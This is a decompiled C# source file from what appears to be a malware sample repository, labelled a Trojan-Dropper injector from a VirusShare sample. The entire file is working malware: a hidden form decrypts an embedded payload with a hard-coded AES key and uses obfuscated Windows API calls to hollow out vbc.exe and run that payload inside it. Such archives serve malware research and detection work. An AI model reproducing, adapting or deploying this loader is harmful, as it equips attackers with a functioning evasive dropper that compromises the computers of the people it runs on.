MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.mhc-b990926a4bd477f047390ee34a32b36eceff630b2274232e6245f16ff668165c/Program/Main.cs

237 lines
11 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Program.Main
// Assembly: rat2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 34AA2F6B-B491-449A-8142-3C7100CB7507
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Injector.mhc-b990926a4bd477f047390ee34a32b36eceff630b2274232e6245f16ff668165c.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace Program
{
public class Main : Form
{
private IContainer Components;
private StringBuilder pGćumcXUežkYzlIo;
[STAThread]
public static void Main() => Application.Run((Form) new Program.Main());
public Main()
{
this.Load += new EventHandler(this.Main_Load);
this.pGćumcXUežkYzlIo = new StringBuilder();
Application.EnableVisualStyles();
this.InitializeComponent();
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(1, 1);
this.Opacity = 0.0;
this.ShowInTaskbar = false;
this.Name = nameof (Main);
this.Text = nameof (Main);
this.ResumeLayout(false);
this.PerformLayout();
}
protected override void Dispose(bool Disposing)
{
if (Disposing && this.Components != null)
this.Components.Dispose();
base.Dispose(Disposing);
}
[DebuggerStepThrough]
private void InitializeComponent()
{
}
public byte[] yIqmESvzfIYlZljžguRŽ(byte[] mZqyPŠJVVTlqŽVžaY)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 48,
(byte) 102,
(byte) 215,
(byte) 119,
(byte) 4,
(byte) 193,
(byte) 141,
(byte) 50,
(byte) 10,
(byte) 3,
(byte) 189,
(byte) 220,
(byte) 157,
(byte) 222,
(byte) 243,
(byte) 22
};
rijndaelManaged.Key = new byte[16]
{
(byte) 22,
(byte) 243,
(byte) 222,
(byte) 157,
(byte) 220,
(byte) 189,
(byte) 3,
(byte) 10,
(byte) 50,
(byte) 141,
(byte) 193,
(byte) 4,
(byte) 119,
(byte) 215,
(byte) 102,
(byte) 48
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(mZqyPŠJVVTlqŽVžaY, 0, mZqyPŠJVVTlqŽVžaY.Length);
}
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
public T ĐaAavDBJxBRšgEvV<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibraryA(ref name), ref method), typeof (T));
public bool FQžsPĐqjNŠJćBPUP(byte[] đhXĐtHKžsJBFqPsNđA, string zmkESwRqWSylPWđW)
{
Program.Main.liLšaggJeUASaožILY lšaggJeUaSaožIly = this.ĐaAavDBJxBRšgEvV<Program.Main.liLšaggJeUASaožILY>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
Program.Main.kjČNLnGZcUUkhFicLqtt lnGzcUukhFicLqtt = this.ĐaAavDBJxBRšgEvV<Program.Main.kjČNLnGZcUUkhFicLqtt>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
Program.Main.gCGAiXSyNQČknfhJj cgAiXsyNqČknfhJj = this.ĐaAavDBJxBRšgEvV<Program.Main.gCGAiXSyNQČknfhJj>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
Program.Main.ČAQFKKOQEZldODwEZZ čaqfkkoqeZldOdwEzz = this.ĐaAavDBJxBRšgEvV<Program.Main.ČAQFKKOQEZldODwEZZ>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
Program.Main.OšHaSOEWWpQrhUwndU haSoewWpQrhUwndU = this.ĐaAavDBJxBRšgEvV<Program.Main.OšHaSOEWWpQrhUwndU>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
Program.Main.uXpYUtBjDŽkjGcžxrmi yutBjDžkjGcžxrmi = this.ĐaAavDBJxBRšgEvV<Program.Main.uXpYUtBjDŽkjGcžxrmi>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
Program.Main.lUajoIDAlCČŽBwLh lUajoIdAlCčžBwLh = this.ĐaAavDBJxBRšgEvV<Program.Main.lUajoIDAlCČŽBwLh>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
Program.Main.kĐvNlEwJSwŽNGČeZĆĐnš nlEwJswŽngČeZćĐnš = this.ĐaAavDBJxBRšgEvV<Program.Main.kĐvNlEwJSwŽNGČeZĆĐnš>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
bool flag;
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] WeWlVVuInjwBčWačmrX = new IntPtr[4];
byte[] cdybCCzžĆOxĐDtžčG = new byte[68];
int int32_1 = BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, 60);
int int16 = (int) BitConverter.ToInt16(đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 6));
IntPtr WJqImihČĐkeĆaIFh = new IntPtr(BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 84)));
if (lšaggJeUaSaožIly((string) null, new StringBuilder(zmkESwRqWSylPWđW), zero1, zero1, false, 4, zero1, (string) null, cdybCCzžĆOxĐDtžčG, WeWlVVuInjwBčWačmrX))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (lnGzcUukhFicLqtt(WeWlVVuInjwBčWačmrX[1], numArray1))
{
IntPtr ŠćwzLerTgđČePĆPzfQKS = new IntPtr(checked ((long) numArray1[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr šbovAwAoREHLIrŽžĆBkO = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (cgAiXsyNqČknfhJj(WeWlVVuInjwBčWačmrX[0], ŠćwzLerTgđČePĆPzfQKS, ref zero2, (int) šbovAwAoREHLIrŽžĆBkO, ref zero3) && nlEwJswŽngČeZćĐnš(WeWlVVuInjwBčWačmrX[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 52)));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 80)));
IntPtr WZEfUoIkLLđPhxozF = čaqfkkoqeZldOdwEzz(WeWlVVuInjwBčWačmrX[0], num1, num2, 12288, 64);
int int32_2 = WZEfUoIkLLđPhxozF.ToInt32();
int QjSXčShRĐfuaYjđŽĆlF;
int num3 = haSoewWpQrhUwndU(WeWlVVuInjwBčWačmrX[0], WZEfUoIkLLđPhxozF, đhXĐtHKžsJBFqPsNđA, checked ((uint) (int) WJqImihČĐkeĆaIFh), QjSXčShRĐfuaYjđŽĆlF) ? 1 : 0;
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) đhXĐtHKžsJBFqPsNđA, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
Buffer.BlockCopy((Array) đhXĐtHKžsJBFqPsNđA, dst[5], (Array) numArray2, 0, numArray2.Length);
num2 = new IntPtr(checked (int32_2 + dst[3]));
num1 = new IntPtr(numArray2.Length);
int num6 = haSoewWpQrhUwndU(WeWlVVuInjwBčWačmrX[0], num2, numArray2, checked ((uint) (int) num1), QjSXčShRĐfuaYjđŽĆlF) ? 1 : 0;
checked { ++num5; }
}
num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
num1 = new IntPtr(4);
int num7 = haSoewWpQrhUwndU(WeWlVVuInjwBčWačmrX[0], num2, BitConverter.GetBytes(WZEfUoIkLLđPhxozF.ToInt32()), checked ((uint) (int) num1), QjSXčShRĐfuaYjđŽĆlF) ? 1 : 0;
numArray1[44] = checked ((uint) (WZEfUoIkLLđPhxozF.ToInt32() + BitConverter.ToInt32(đhXĐtHKžsJBFqPsNđA, int32_1 + 40)));
int num8 = yutBjDžkjGcžxrmi(WeWlVVuInjwBčWačmrX[1], numArray1) ? 1 : 0;
}
}
int num = (int) lUajoIdAlCčžBwLh(WeWlVVuInjwBčWačmrX[1]);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_11;
}
flag = true;
label_11:
return flag;
}
private void Main_Load(object sender, EventArgs e)
{
RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("glavni"));
this.FQžsPĐqjNŠJćBPUP(this.yIqmESvzfIYlZljžguRŽ(My.Resources.Resources.glavni), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
this.Close();
}
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool liLšaggJeUASaožILY(
string ioTwšhmćJoWžbkJqW,
StringBuilder hvKuTwugaluJwđwšUt,
IntPtr zšCQIzOwuVŠqoxzuh,
IntPtr wEEYFXčuqidđjPĆJcss,
[MarshalAs(UnmanagedType.Bool)] bool oqCqqsĐlVsCtŽRZQPđgw,
int WtWŠXPqjdBŽČdbqUE,
IntPtr nćNpOđkbĆtžolrfPUXyg,
string ĐĐVUaćgduTYukGHj,
byte[] cdybCCzžĆOxĐDtžčG,
IntPtr[] WeWlVVuInjwBčWačmrX);
public delegate bool OšHaSOEWWpQrhUwndU(
IntPtr WXvpCIYlSnxqŠšGčxmc,
IntPtr WZEfUoIkLLđPhxozF,
byte[] OibqgŠyakgŽtxtjyoCa,
uint WJqImihČĐkeĆaIFh,
int QjSXčShRĐfuaYjđŽĆlF);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool gCGAiXSyNQČknfhJj(
IntPtr XXmžežćIđčknFBTmz,
IntPtr ŠćwzLerTgđČePĆPzfQKS,
ref IntPtr ĐCapyPtĆčxqNHYJs,
int šbovAwAoREHLIrŽžĆBkO,
ref IntPtr ssNDtKĆeDHSŽQdgĆĆHYn);
public delegate IntPtr ČAQFKKOQEZldODwEZZ(
IntPtr XiyfXnIAgzKšRBkGc,
IntPtr fGŽFCFRemšpAFpŠGNxD,
IntPtr BNJECŠužcOkyobPFU,
int šELABbĆxlUnĆBFBe,
int fepAkĆsZDAČČsmFćAčh);
public delegate uint kĐvNlEwJSwŽNGČeZĆĐnš(IntPtr arcaBZpWđčiagŠblvj, IntPtr ćYšwdIXERćqmzŽTq);
public delegate uint lUajoIDAlCČŽBwLh(IntPtr GilVZdjJzXQŽAHzp);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool kjČNLnGZcUUkhFicLqtt(IntPtr LČSyPTYPčQĐScejlFđa, uint[] dhbJđČxSgUTpgćeKpi);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool uXpYUtBjDŽkjGcžxrmi(IntPtr HlpzŽĆXeiŽybNpdpYW, uint[] ĆAbxvlKAsNUEčTpqP);
}
}